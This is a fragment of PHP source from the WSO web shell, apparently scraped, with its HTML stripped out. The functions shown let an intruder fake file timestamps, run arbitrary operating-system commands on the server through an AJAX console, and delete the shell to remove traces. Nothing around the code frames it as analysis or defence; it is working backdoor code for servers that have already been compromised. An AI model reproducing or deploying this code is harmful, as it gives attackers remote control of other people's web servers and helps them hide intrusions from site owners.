                                      '; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
                                      '; break; } echo '
                                      '; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo 'd.cf.cmd.value='';\n'; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes('\n$ '.$_POST['p1'].'\n'.wsoEx($_POST['p1']),'\n\r\t\\'\0')); if(preg_match('!.*cd\s+([^;]+)$!',$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo 'c_=''.$GLOBALS['cwd'].'';'; } } echo 'd.cf.output.value+=''.$temp.'';'; echo 'd.cf.output.scrollTop = d.cf.output.scrollHeight;'; $temp = ob_get_clean(); echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ''; echo '

                                      Console

                                      send using AJAX redirect stderr to stdout (2>&1)
                                      $
                                      '; echo '
                                      '; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

                                      Suicide

                                      remove the shell?